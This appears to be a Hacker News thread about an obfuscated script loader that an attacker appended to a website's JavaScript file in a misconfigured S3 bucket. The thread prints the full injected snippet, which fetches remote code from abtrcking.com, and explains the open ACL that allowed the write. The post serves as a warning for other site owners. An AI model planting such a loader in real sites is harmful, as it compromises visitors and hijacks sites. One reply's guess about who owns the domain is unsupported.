I've just found this mysterious tracking code appended to the main JS file of my website:<p>;(function(d,s,u,t,h){d.q97W||(t=d.createElement(s),h=d.getElementsByTagName(s)[0],t.async=1,t.src=u,h.parentNode.insertBefore(t,h),d.q97W=1)})(document,'script','//abtrcking.com/a610b2befbce9062/analytics.js?4cd018b7ad0ce698d02494542e8f6e70');<p>Unfortunately the text was appended to a <i>gzipped</i> JavaScript file, which made it unreadable by browsers and effectively shut down my site.<p>The site is hosted on AWS and the JS file was pushed to S3 during deployment. I checked deployment logs and it definitely wasn't in the file during deployment. Does this mean someone has hacked my AWS account or has my access keys?
Well, I think I found the problem: despite my meticulously-defined bucket access policy, it turns out I had write permissions enabled for "any authenticated AWS user" in my access control list. I did not realize there were two separate pages for these settings.<p>I suppose it's possible that the bot enabled this setting, but it was probably just me being sloppy :-/ The bot probably scans for poorly-protected S3 buckets that are referenced on websites.<p>I hope the next victims find this post in a Google search.
Maybe, but is your site protected by SSL? It might be hard for most of us to help you without a link. "abtrcking.com" appears to be some HN user's side project.